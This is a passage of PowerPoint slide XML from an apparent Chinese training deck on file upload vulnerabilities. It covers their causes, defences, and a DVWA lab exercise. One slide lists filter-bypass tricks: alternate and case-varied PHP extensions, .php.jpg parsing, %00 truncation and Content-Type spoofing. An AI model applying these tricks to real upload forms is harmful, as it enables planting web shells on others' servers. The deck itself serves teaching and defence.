      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="屏幕截图 2025-07-08 120726"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1885950"/>
            <a:ext cx="5669280" cy="3786505"/>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3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422910" y="98679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2</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、漏洞产生</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原因</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5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="991870" y="2096135"/>
            <a:ext cx="4901565" cy="2861310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对于上传文件的后缀名（扩展名）没有做较为严格的限制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对于上传文件的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MIMETYPE(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用于描述文件的类型的一种表述方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>没有做检查</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>权限上没有对于上传的文件目录设置不可执行权限，（尤其是对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shebang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>类型的文件）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对于上传文件或者指定目录的行为没有做限制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6070600" y="1894840"/>
            <a:ext cx="5800090" cy="312547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3</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、漏洞攻击与</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防御</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561975" y="1901190"/>
            <a:ext cx="1544955" cy="837565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3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攻击：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3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6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6431915" y="1901190"/>
            <a:ext cx="1544955" cy="837565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3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防御：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3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9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836420" y="1985010"/>
            <a:ext cx="4064000" cy="4246245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>绕过客户端检测：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>禁用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>或修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请求（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>改包），绕过前端文件类型校验</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>绕过服务器端检测：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>黑名单绕过：用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.phtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.php5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.cer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等未过滤扩展名，或大小写变形（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.PhP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>白名单绕过：利用解析漏洞（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.php.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中被解析为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）或特殊字符（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>截断）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MIME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>类型伪造：修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>伪装合法文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7676515" y="1985010"/>
            <a:ext cx="4064000" cy="3415030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>严格文件校验：采用白名单限制扩展名，并校验文件头（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FFD8FF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JPEG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>检测文件内容，避免图片马（如使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getimagesize()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>上传目录设为不可执行，并随机化文件名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>路径</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用独立文件服务器，避免同源策略风险</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>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5" name="文本框 4"/>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6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1058545" y="1830070"/>
            <a:ext cx="8529955" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>这里用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>靶场环境进行漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2452370" y="2279650"/>
            <a:ext cx="7083425" cy="429387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1094740" y="1778635"/>
            <a:ext cx="7410450" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>这里我们发现有上传文件按钮，发现对上传文件的类型有限制，于是推测有文件上传漏洞存在</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2391410" y="2638425"/>
            <a:ext cx="7235190" cy="369443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7385685" y="0"/>
            <a:ext cx="4806315" cy="4516120"/>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2788920"/>
            <a:ext cx="4778375" cy="4069080"/>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4450080" cy="68580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6983730" y="0"/>
            <a:ext cx="5208270" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="57" name="组合 56"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="12700"/>
            <a:ext cx="4610100" cy="68580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7581900" y="0"/>
            <a:ext cx="4610100" cy="68580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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-369887" y="13335"/>
            <a:ext cx="12191365" cy="6857365"/>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nvGrpSpPr>
          <p:cNvPr id="29" name="组合 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2795110" y="115253"/>
            <a:ext cx="5683570" cy="1353185"/>
            <a:chOff x="5310" y="2441"/>
            <a:chExt cx="8589" cy="2131"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="文本框 29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5310" y="2441"/>
              <a:ext cx="8589" cy="2131"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="8200" b="1">
                  <a:ln w="1270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目录</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="8200" b="1">
                <a:ln w="1270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31" name="文本框 30"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7060" y="2441"/>
              <a:ext cx="5089" cy="2131"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="8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目录</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="8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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3444875" y="1804670"/>
            <a:ext cx="4384675" cy="690880"/>
            <a:chOff x="2798" y="3829"/>
            <a:chExt cx="6905" cy="1088"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4028" y="3829"/>
              <a:ext cx="5675" cy="1088"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
